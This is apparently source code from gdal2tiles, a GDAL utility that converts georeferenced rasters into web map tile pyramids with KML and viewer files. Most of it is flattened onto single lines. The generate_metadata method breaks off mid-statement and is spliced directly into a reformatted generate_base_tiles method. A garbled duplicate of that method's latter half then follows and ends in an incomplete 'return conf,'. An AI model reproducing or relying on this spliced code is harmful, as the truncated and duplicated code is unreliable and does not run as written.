GDALWarpOptions. Why put it in a specific place? tb = ElementTree.TreeBuilder() tb.start("Option", {"name": "INIT_DEST"}) tb.data("0") tb.end("Option") elem = tb.close() warp_options.append(elem) return ElementTree.tostring(vrt_root).decode() def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None): """ Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has not been forced by options """ if warped_vrt_dataset.RasterCount in [1, 3]: tempfilename = gettempfilename('-gdal2tiles.vrt') warped_vrt_dataset.GetDriver().CreateCopy(tempfilename, warped_vrt_dataset) with open(tempfilename) as f: orig_data = f.read() alpha_data = add_alpha_band_to_string_vrt(orig_data) with open(tempfilename, 'w') as f: f.write(alpha_data) warped_vrt_dataset = gdal.Open(tempfilename) os.unlink(tempfilename) if options and options.verbose: print("Modified -dstalpha warping result saved into 'tiles1.vrt'") # TODO: gbataille - test replacing that with a gdal write of the dataset (more # accurately what's used, even if should be the same with open("tiles1.vrt", "w") as f: f.write(alpha_data) return warped_vrt_dataset def nb_data_bands(dataset): """ Return the number of data (non-alpha) bands of a gdal dataset """ alphaband = dataset.GetRasterBand(1).GetMaskBand() if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or dataset.RasterCount == 4 or dataset.RasterCount == 2): return dataset.RasterCount - 1 else: return dataset.RasterCount def gettempfilename(suffix): """Returns a temporary filename""" if '_' in os.environ: # tempfile.mktemp() crashes on some Wine versions (the one of Ubuntu 12.04 particularly) if os.environ['_'].find('wine') >= 0: tmpdir = '.' 
if 'TMP' in os.environ: tmpdir = os.environ['TMP'] import time import random random.seed(time.time()) random_part = 'file%d' % random.randint(0, 1000000000) return os.path.join(tmpdir, random_part + suffix) return tempfile.mktemp(suffix) def create_base_tile(tile_job_info, tile_detail, queue=None): gdal.AllRegister() dataBandsCount = tile_job_info.nb_data_bands output = tile_job_info.output_file_path tileext = tile_job_info.tile_extension tilesize = tile_job_info.tile_size options = tile_job_info.options tilebands = dataBandsCount + 1 ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly) mem_drv = gdal.GetDriverByName('MEM') out_drv = gdal.GetDriverByName(tile_job_info.tile_driver) alphaband = ds.GetRasterBand(1).GetMaskBand() tx = tile_detail.tx ty = tile_detail.ty tz = tile_detail.tz rx = tile_detail.rx ry = tile_detail.ry rxsize = tile_detail.rxsize rysize = tile_detail.rysize wx = tile_detail.wx wy = tile_detail.wy wxsize = tile_detail.wxsize wysize = tile_detail.wysize querysize = tile_detail.querysize # Tile dataset in memory tilefilename = os.path.join( output, str(tz), str(tx), "%s.%s" % (ty, tileext)) dstile = mem_drv.Create('', tilesize, tilesize, tilebands) data = alpha = None if options.verbose: print("\tReadRaster Extent: ", (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)) # Query is in 'nearest neighbour' but can be bigger in then the tilesize # We scale down the query to the tilesize by supplied algorithm. if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0: data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize, band_list=list(range(1, dataBandsCount + 1))) alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize) # The tile in memory is a transparent file by default. 
Write pixel values into it if # any if data: if tilesize == querysize: # Use the ReadRaster result directly in tiles ('nearest neighbour' query) dstile.WriteRaster(wx, wy, wxsize, wysize, data, band_list=list(range(1, dataBandsCount + 1))) dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands]) # Note: For source drivers based on WaveLet compression (JPEG2000, ECW, # MrSID) the ReadRaster function returns high-quality raster (not ugly # nearest neighbour) # TODO: Use directly 'near' for WaveLet files else: # Big ReadRaster query in memory scaled to the tilesize - all but 'near' # algo dsquery = mem_drv.Create('', querysize, querysize, tilebands) # TODO: fill the null value in case a tile without alpha is produced (now # only png tiles are supported) dsquery.WriteRaster(wx, wy, wxsize, wysize, data, band_list=list(range(1, dataBandsCount + 1))) dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands]) scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options, tilefilename=tilefilename) del dsquery # Force freeing the memory to make sure the C++ destructor is called and the memory as well as # the file locks are released del ds del data if options.resampling != 'antialias': # Write a copy of tile to png/jpg out_drv.CreateCopy(tilefilename, dstile, strict=0) del dstile # Create a KML file for this tile. 
if tile_job_info.kml: kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty) if not options.resume or not os.path.exists(kmlfilename): with open(kmlfilename, 'wb') as f: f.write(generate_kml( tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size, tile_job_info.tile_swne, tile_job_info.options ).encode('utf-8')) if queue: queue.put("tile %s %s %s" % (tx, ty, tz)) def create_overview_tiles(tile_job_info, output_folder, options): """Generation of the overview tiles (higher in the pyramid) based on existing tiles""" mem_driver = gdal.GetDriverByName('MEM') tile_driver = tile_job_info.tile_driver out_driver = gdal.GetDriverByName(tile_driver) tilebands = tile_job_info.nb_data_bands + 1 # Usage of existing tiles: from 4 underlying tiles generate one as overview. tcount = 0 for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1): tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz] tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy)) ti = 0 if tcount == 0: return if not options.quiet: print("Generating Overview Tiles:") progress_bar = ProgressBar(tcount) progress_bar.start() for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1): tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz] for ty in range(tmaxy, tminy - 1, -1): for tx in range(tminx, tmaxx + 1): ti += 1 tilefilename = os.path.join(output_folder, str(tz), str(tx), "%s.%s" % (ty, tile_job_info.tile_extension)) if options.verbose: print(ti, '/', tcount, tilefilename) if options.resume and os.path.exists(tilefilename): if options.verbose: print("Tile generation skipped because of --resume") else: progress_bar.log_progress() continue # Create directories for the tile if not os.path.exists(os.path.dirname(tilefilename)): os.makedirs(os.path.dirname(tilefilename)) dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size, 2 * tile_job_info.tile_size, tilebands) # TODO: fill the null value dstile = mem_driver.Create('', tile_job_info.tile_size, 
tile_job_info.tile_size, tilebands) # TODO: Implement more clever walking on the tiles with cache functionality # probably walk should start with reading of four tiles from top left corner # Hilbert curve children = [] # Read the tiles and write them to query window for y in range(2 * ty, 2 * ty + 2): for x in range(2 * tx, 2 * tx + 2): minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1] if x >= minx and x <= maxx and y >= miny and y <= maxy: dsquerytile = gdal.Open( os.path.join(output_folder, str(tz + 1), str(x), "%s.%s" % (y, tile_job_info.tile_extension)), gdal.GA_ReadOnly) if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0): tileposy = 0 else: tileposy = tile_job_info.tile_size if tx: tileposx = x % (2 * tx) * tile_job_info.tile_size elif tx == 0 and x == 1: tileposx = tile_job_info.tile_size else: tileposx = 0 dsquery.WriteRaster( tileposx, tileposy, tile_job_info.tile_size, tile_job_info.tile_size, dsquerytile.ReadRaster(0, 0, tile_job_info.tile_size, tile_job_info.tile_size), band_list=list(range(1, tilebands + 1))) children.append([x, y, tz + 1]) scale_query_to_tile(dsquery, dstile, tile_driver, options, tilefilename=tilefilename) # Write a copy of tile to png/jpg if options.resampling != 'antialias': # Write a copy of tile to png/jpg out_driver.CreateCopy(tilefilename, dstile, strict=0) if options.verbose: print("\tbuild from zoom", tz + 1, " tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty), (2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1)) # Create a KML file for this tile. 
if tile_job_info.kml: with open(os.path.join( output_folder, '%d/%d/%d.kml' % (tz, tx, ty) ), 'wb') as f: f.write(generate_kml( tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size, get_tile_swne(tile_job_info, options), options, children ).encode('utf-8')) if not options.verbose and not options.quiet: progress_bar.log_progress() def optparse_init(): """Prepare the option parser for input (argv)""" from optparse import OptionParser, OptionGroup usage = "Usage: %prog [options] input_file [output]" p = OptionParser(usage, version="%prog " + __version__) p.add_option("-p", "--profile", dest='profile', type='choice', choices=profile_list, help=("Tile cutting profile (%s) - default 'mercator' " "(Google Maps compatible)" % ",".join(profile_list))) p.add_option("-r", "--resampling", dest="resampling", type='choice', choices=resampling_list, help="Resampling method (%s) - default 'average'" % ",".join(resampling_list)) p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS", help="The spatial reference system used for the source input data") p.add_option('-z', '--zoom', dest="zoom", help="Zoom levels to render (format:'2-5' or '10').") p.add_option('-e', '--resume', dest="resume", action="store_true", help="Resume mode. 
Generate only missing files.") p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA", help="NODATA transparency value to assign to the input data") p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true", help=("When using the geodetic profile, specifies the base resolution " "as 0.703125 or 2 tiles at zoom level 0.")) p.add_option("-v", "--verbose", action="store_true", dest="verbose", help="Print status messages to stdout") p.add_option("-q", "--quiet", action="store_true", dest="quiet", help="Disable messages and status to stdout") p.add_option("--processes", dest="nb_processes", type='int', help="Number of processes to use for tiling") # KML options g = OptionGroup(p, "KML (Google Earth) options", "Options for generated Google Earth SuperOverlay metadata") g.add_option("-k", "--force-kml", dest='kml', action="store_true", help=("Generate KML for Google Earth - default for 'geodetic' profile and " "'raster' in EPSG:4326. For a dataset with different projection use " "with caution!")) g.add_option("-n", "--no-kml", dest='kml', action="store_false", help="Avoid automatic generation of KML files for EPSG:4326") g.add_option("-u", "--url", dest='url', help="URL address where the generated tiles are going to be published") p.add_option_group(g) # HTML options g = OptionGroup(p, "Web viewer options", "Options for generated HTML viewers a la Google Maps") g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list, help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list)) g.add_option("-t", "--title", dest='title', help="Title of the map") g.add_option("-c", "--copyright", dest='copyright', help="Copyright for the map") g.add_option("-g", "--googlekey", dest='googlekey', help="Google Maps API key from http://code.google.com/apis/maps/signup.html") g.add_option("-b", "--bingkey", dest='bingkey', help="Bing Maps API key from https://www.bingmapsportal.com/") p.add_option_group(g) 
p.set_defaults(verbose=False, profile="mercator", kml=False, url='', webviewer='all', copyright='', resampling='average', resume=False, googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE', processes=1) return p def process_args(argv): parser = optparse_init() options, args = parser.parse_args(args=argv) # Args should be either an input file OR an input file and an output folder if (len(args) == 0): exit_with_error("You need to specify at least an input file as argument to the script") if (len(args) > 2): exit_with_error("Processing of several input files is not supported.", "Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the " "files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args)) input_file = args[0] if not os.path.isfile(input_file): exit_with_error("The provided input file %s does not exist or is not a file" % input_file) if len(args) == 2: output_folder = args[1] else: output_folder = os.path.basename(input_file) options = options_post_processing(options, input_file, output_folder) return input_file, output_folder, options def options_post_processing(options, input_file, output_folder): if not options.title: options.title = os.path.basename(input_file) if options.url and not options.url.endswith('/'): options.url += '/' if options.url: out_path = output_folder if out_path.endswith("/"): out_path = out_path[:-1] options.url += os.path.basename(out_path) + '/' # Supported options if options.resampling == 'average': try: if gdal.RegenerateOverview: pass except Exception: exit_with_error("'average' resampling algorithm is not available.", "Please use -r 'near' argument or upgrade to newer version of GDAL.") elif options.resampling == 'antialias': try: if numpy: # pylint:disable=W0125 pass except Exception: exit_with_error("'antialias' resampling algorithm is not available.", "Install PIL (Python Imaging Library) and numpy.") try: os.path.basename(input_file).encode('ascii') except UnicodeEncodeError: full_ascii = False else: 
full_ascii = True # LC_CTYPE check if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""): if not options.quiet: print("\nWARNING: " "You are running gdal2tiles.py with a LC_CTYPE environment variable that is " "not UTF-8 compatible, and your input file contains non-ascii characters. " "The generated sample googlemaps, openlayers or " "leaflet files might contain some invalid characters as a result\n") # Output the results if options.verbose: print("Options:", options) print("Input:", input_file) print("Output:", output_folder) print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024)) print('') return options class TileDetail(object): tx = 0 ty = 0 tz = 0 rx = 0 ry = 0 rxsize = 0 rysize = 0 wx = 0 wy = 0 wxsize = 0 wysize = 0 querysize = 0 def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __str__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __repr__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) class TileJobInfo(object): """ Plain object to hold tile job configuration for a dataset """ src_file = "" nb_data_bands = 0 output_file_path = "" tile_extension = "" tile_size = 0 tile_driver = None kml = False tminmax = [] tminz = 0 tmaxz = 0 in_srs_wkt = 0 out_geo_trans = [] ominy = 0 is_epsg_4326 = False options = None def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileJobInfo %s\n" % (self.src_file) def __str__(self): return "TileJobInfo %s\n" % (self.src_file) def __repr__(self): return "TileJobInfo %s\n" % (self.src_file) class Gdal2TilesError(Exception): pass class GDAL2Tiles(object): def __init__(self, input_file, output_folder, options): """Constructor function - initialization""" self.out_drv = None self.mem_drv = None self.warped_input_dataset = None self.out_srs = None 
self.nativezoom = None self.tminmax = None self.tsize = None self.mercator = None self.geodetic = None self.alphaband = None self.dataBandsCount = None self.out_gt = None self.tileswne = None self.swne = None self.ominx = None self.omaxx = None self.omaxy = None self.ominy = None self.input_file = None self.output_folder = None # Tile format self.tilesize = 256 self.tiledriver = 'PNG' self.tileext = 'png' self.tmp_dir = tempfile.mkdtemp() self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt') # Should we read bigger window of the input raster and scale it down? # Note: Modified later by open_input() # Not for 'near' resampling # Not for Wavelet based drivers (JPEG2000, ECW, MrSID) # Not for 'raster' profile self.scaledquery = True # How big should be query window be for scaling down # Later on reset according the chosen resampling algorightm self.querysize = 4 * self.tilesize # Should we use Read on the input file for generating overview tiles? # Note: Modified later by open_input() # Otherwise the overview tiles are generated from existing underlying tiles self.overviewquery = False self.input_file = input_file self.output_folder = output_folder self.options = options if self.options.resampling == 'near': self.querysize = self.tilesize elif self.options.resampling == 'bilinear': self.querysize = self.tilesize * 2 # User specified zoom levels self.tminz = None self.tmaxz = None if self.options.zoom: minmax = self.options.zoom.split('-', 1) minmax.extend(['']) zoom_min, zoom_max = minmax[:2] self.tminz = int(zoom_min) if zoom_max: self.tmaxz = int(zoom_max) else: self.tmaxz = int(zoom_min) # KML generation self.kml = self.options.kml # ------------------------------------------------------------------------- def open_input(self): """Initialization of the input raster, reprojection if necessary""" gdal.AllRegister() self.out_drv = gdal.GetDriverByName(self.tiledriver) self.mem_drv = gdal.GetDriverByName('MEM') if not self.out_drv: raise 
Exception("The '%s' driver was not found, is it available in this GDAL build?", self.tiledriver) if not self.mem_drv: raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?") # Open the input file if self.input_file: input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly) else: raise Exception("No input file was specified") if self.options.verbose: print("Input file:", "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize, input_dataset.RasterYSize, input_dataset.RasterCount)) if not input_dataset: # Note: GDAL prints the ERROR message too exit_with_error("It is not possible to open the input file '%s'." % self.input_file) # Read metadata from the input file if input_dataset.RasterCount == 0: exit_with_error("Input file '%s' has no raster band" % self.input_file) if input_dataset.GetRasterBand(1).GetRasterColorTable(): exit_with_error( "Please convert this file to RGB/RGBA and run gdal2tiles on the result.", "From paletted file you can create RGBA file (temp.vrt) by:\n" "gdal_translate -of vrt -expand rgba %s temp.vrt\n" "then run:\n" "gdal2tiles temp.vrt" % self.input_file ) in_nodata = setup_no_data_values(input_dataset, self.options) if self.options.verbose: print("Preprocessed file:", "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize, input_dataset.RasterYSize, input_dataset.RasterCount)) in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options) self.out_srs = setup_output_srs(in_srs, self.options) # If input and output reference systems are different, we reproject the input dataset into # the output reference system for easier manipulation self.warped_input_dataset = None if self.options.profile in ('mercator', 'geodetic'): if not in_srs: exit_with_error( "Input file has unknown SRS.", "Use --s_srs ESPG:xyz (or similar) to provide source reference system.") if not has_georeference(input_dataset): exit_with_error( "There is no georeference - neither affine transformation (worldfile) " "nor GCPs. 
You can generate only 'raster' profile tiles.", "Either gdal2tiles with parameter -p 'raster' or use another GIS " "software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs" ) if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or (input_dataset.GetGCPCount() != 0)): self.warped_input_dataset = reproject_dataset( input_dataset, in_srs, self.out_srs) if in_nodata: self.warped_input_dataset = update_no_data_values( self.warped_input_dataset, in_nodata, options=self.options) else: self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs( self.warped_input_dataset, options=self.options) if self.warped_input_dataset and self.options.verbose: print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % ( self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize, self.warped_input_dataset.RasterCount)) if not self.warped_input_dataset: self.warped_input_dataset = input_dataset self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename, self.warped_input_dataset) # Get alpha band (either directly or from NODATA value) self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand() self.dataBandsCount = nb_data_bands(self.warped_input_dataset) # KML test self.isepsg4326 = False srs4326 = osr.SpatialReference() srs4326.ImportFromEPSG(4326) if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4(): self.kml = True self.isepsg4326 = True if self.options.verbose: print("KML autotest OK!") # Read the georeference self.out_gt = self.warped_input_dataset.GetGeoTransform() # Test the size of the pixel # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile) if (self.out_gt[2], self.out_gt[4]) != (0, 0): exit_with_error("Georeference of the raster contains rotation or skew. " "Such raster is not supported. 
Please use gdalwarp first.") # Here we expect: pixel is square, no rotation on the raster # Output Bounds - coordinates in the output SRS self.ominx = self.out_gt[0] self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1] self.omaxy = self.out_gt[3] self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1] # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15 if self.options.verbose: print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy) # Calculating ranges for tiles in different zoom levels if self.options.profile == 'mercator': self.mercator = GlobalMercator() # Function which generates SWNE in LatLong for given tile self.tileswne = self.mercator.TileLatLonBounds # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, 32)) for tz in range(0, 32): tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz) tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz) # crop tiles extending world limits (+-180,+-90) tminx, tminy = max(0, tminx), max(0, tminy) tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # TODO: Maps crossing 180E (Alaska?) 
# Get the minimal zoom level (map covers area equivalent to one tile) if self.tminz is None: self.tminz = self.mercator.ZoomForPixelSize( self.out_gt[1] * max(self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize) / float(self.tilesize)) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tmaxz is None: self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1]) if self.options.verbose: print("Bounds (latlong):", self.mercator.MetersToLatLon(self.ominx, self.ominy), self.mercator.MetersToLatLon(self.omaxx, self.omaxy)) print('MinZoomLevel:', self.tminz) print("MaxZoomLevel:", self.tmaxz, "(", self.mercator.Resolution(self.tmaxz), ")") if self.options.profile == 'geodetic': self.geodetic = GlobalGeodetic(self.options.tmscompatible) # Function which generates SWNE in LatLong for given tile self.tileswne = self.geodetic.TileLatLonBounds # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, 32)) for tz in range(0, 32): tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz) tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz) # crop tiles extending world limits (+-180,+-90) tminx, tminy = max(0, tminx), max(0, tminy) tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # TODO: Maps crossing 180E (Alaska?) 
# Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tminz is None: self.tminz = self.geodetic.ZoomForPixelSize( self.out_gt[1] * max(self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize) / float(self.tilesize)) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tmaxz is None: self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1]) if self.options.verbose: print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy) if self.options.profile == 'raster': def log2(x): return math.log10(x) / math.log10(2) self.nativezoom = int( max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tilesize))), math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tilesize))))) if self.options.verbose: print("Native zoom of the raster:", self.nativezoom) # Get the minimal zoom level (whole raster in one tile) if self.tminz is None: self.tminz = 0 # Get the maximal zoom level (native resolution of the raster) if self.tmaxz is None: self.tmaxz = self.nativezoom # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, self.tmaxz + 1)) self.tsize = list(range(0, self.tmaxz + 1)) for tz in range(0, self.tmaxz + 1): tsize = 2.0**(self.nativezoom - tz) * self.tilesize tminx, tminy = 0, 0 tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1 tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1 self.tsize[tz] = math.ceil(tsize) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # Function which generates SWNE in LatLong for given tile if self.kml and self.in_srs_wkt: ct = osr.CoordinateTransformation(in_srs, srs4326) def rastertileswne(x, y, z): pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level west = self.out_gt[0] + x * self.tilesize * pixelsizex east = west + self.tilesize * pixelsizex south = self.ominy + y * self.tilesize * 
pixelsizex north = south + self.tilesize * pixelsizex if not self.isepsg4326: # Transformation to EPSG:4326 (WGS84 datum) west, south = ct.TransformPoint(west, south)[:2] east, north = ct.TransformPoint(east, north)[:2] return south, west, north, east self.tileswne = rastertileswne else: self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa def generate_metadata(self): """ Generation of main metadata files and HTML viewers (metadata related to particular tiles are generated during the tile processing). """ if not os.path.exists(self.output_folder): os.makedirs(self.output_folder) if self.options.profile == 'mercator': south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy) north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy) south, west = max(-85.05112878, south), max(-180.0, west) north, east = min(85.05112878, north), min(180.0, east) self.swne = (south, west, north, east) # Generate googlemaps.html if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator': if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))): with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f: f.write(self.generate_googlemaps().encode('utf-8')) # Generate openlayers.html if self.options.webviewer in ('all', 'openlayers'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))): with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f: f.write(self.generate_openlayers().encode('utf-8')) # Generate leaflet.html if self.options.webviewer in ('all', 'leaflet'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))): with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f: f.write(self.generate_leaflet().encode('utf-8')) elif self.options.profile == 'geodetic': west, south = self.ominx, self.ominy east, north = self.omaxx, self.omaxy south, west = 
    def generate_base_tiles(self):
        """
        Generation of the base tiles (the lowest in the pyramid) directly from the input raster.

        Builds a list of TileDetail records (one per base tile, holding the
        raster read window rx/ry/rxsize/rysize and the write window
        wx/wy/wxsize/wysize) plus a TileJobInfo describing the whole job, and
        returns the pair ``(conf, tile_details)``.  No pixels are read here —
        the actual raster I/O happens later, in the tile workers.
        """

        if not self.options.quiet:
            print("Generating Base Tiles:")

        if self.options.verbose:
            print('')
            print("Tiles generated from the max zoom level:")
            print("----------------------------------------")
            print('')

        # Set the bounds: tile index range at the maximum zoom level.
        tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]

        ds = self.warped_input_dataset
        # +1 for the alpha band added to the output tiles.
        tilebands = self.dataBandsCount + 1
        querysize = self.querysize

        if self.options.verbose:
            print("dataBandsCount: ", self.dataBandsCount)
            print("tilebands: ", tilebands)

        tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
        ti = 0

        tile_details = []

        tz = self.tmaxz
        # TMS y counts upward, so iterate ty from max down to min.
        for ty in range(tmaxy, tminy - 1, -1):
            for tx in range(tminx, tmaxx + 1):

                ti += 1
                tilefilename = os.path.join(
                    self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext))
                if self.options.verbose:
                    print(ti, '/', tcount, tilefilename)

                if self.options.resume and os.path.exists(tilefilename):
                    if self.options.verbose:
                        print("Tile generation skipped because of --resume")
                    continue

                # Create directories for the tile
                if not os.path.exists(os.path.dirname(tilefilename)):
                    os.makedirs(os.path.dirname(tilefilename))

                if self.options.profile == 'mercator':
                    # Tile bounds in EPSG:3857
                    b = self.mercator.TileBounds(tx, ty, tz)
                elif self.options.profile == 'geodetic':
                    b = self.geodetic.TileBounds(tx, ty, tz)

                # Don't scale up by nearest neighbour, better change the querysize
                # to the native resolution (and return smaller query tile) for scaling

                if self.options.profile in ('mercator', 'geodetic'):
                    # First query at native resolution, only to report the
                    # native extent when verbose.
                    rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])

                    # Pixel size in the raster covering query geo extent
                    nativesize = wb[0] + wb[2]
                    if self.options.verbose:
                        print("\tNative Extent (querysize", nativesize, "): ", rb, wb)

                    # Tile bounds in raster coordinates for ReadRaster query
                    rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)

                    rx, ry, rxsize, rysize = rb
                    wx, wy, wxsize, wysize = wb

                else:     # 'raster' profile:

                    # tilesize in raster coordinates for actual zoom
                    tsize = int(self.tsize[tz])
                    xsize = self.warped_input_dataset.RasterXSize     # size of the raster in pixels
                    ysize = self.warped_input_dataset.RasterYSize
                    if tz >= self.nativezoom:
                        querysize = self.tilesize

                    rx = (tx) * tsize
                    # Edge tiles may be narrower than a full tile.
                    rxsize = 0
                    if tx == tmaxx:
                        rxsize = xsize % tsize
                    if rxsize == 0:
                        rxsize = tsize

                    rysize = 0
                    if ty == tmaxy:
                        rysize = ysize % tsize
                    if rysize == 0:
                        rysize = tsize
                    # Raster row origin is at the top, tile rows at the bottom.
                    ry = ysize - (ty * tsize) - rysize

                    wx, wy = 0, 0
                    wxsize = int(rxsize / float(tsize) * self.tilesize)
                    wysize = int(rysize / float(tsize) * self.tilesize)
                    if wysize != self.tilesize:
                        wy = self.tilesize - wysize

                # Read the source raster if anything is going inside the tile as per the computed
                # geo_query
                tile_details.append(
                    TileDetail(
                        tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
                        wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
                    )
                )

        conf = TileJobInfo(
            src_file=self.tmp_vrt_filename,
            nb_data_bands=self.dataBandsCount,
            output_file_path=self.output_folder,
            tile_extension=self.tileext,
            tile_driver=self.tiledriver,
            tile_size=self.tilesize,
            kml=self.kml,
            tminmax=self.tminmax,
            tminz=self.tminz,
            tmaxz=self.tmaxz,
            in_srs_wkt=self.in_srs_wkt,
            out_geo_trans=self.out_gt,
            ominy=self.ominy,
            is_epsg_4326=self.isepsg4326,
            options=self.options,
        )

        return conf, tile_details
ysize = self.warped_input_dataset.RasterYSize if tz >= self.nativezoom: querysize = self.tilesize rx = (tx) * tsize rxsize = 0 if tx == tmaxx: rxsize = xsize % tsize if rxsize == 0: rxsize = tsize rysize = 0 if ty == tmaxy: rysize = ysize % tsize if rysize == 0: rysize = tsize ry = ysize - (ty * tsize) - rysize wx, wy = 0, 0 wxsize = int(rxsize / float(tsize) * self.tilesize) wysize = int(rysize / float(tsize) * self.tilesize) if wysize != self.tilesize: wy = self.tilesize - wysize # Read the source raster if anything is going inside the tile as per the computed # geo_query tile_details.append( TileDetail( tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx, wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize, ) ) conf = TileJobInfo( src_file=self.tmp_vrt_filename, nb_data_bands=self.dataBandsCount, output_file_path=self.output_folder, tile_extension=self.tileext, tile_driver=self.tiledriver, tile_size=self.tilesize, kml=self.kml, tminmax=self.tminmax, tminz=self.tminz, tmaxz=self.tmaxz, in_srs_wkt=self.in_srs_wkt, out_geo_trans=self.out_gt, ominy=self.ominy, is_epsg_4326=self.isepsg4326, options=self.options, ) return conf, 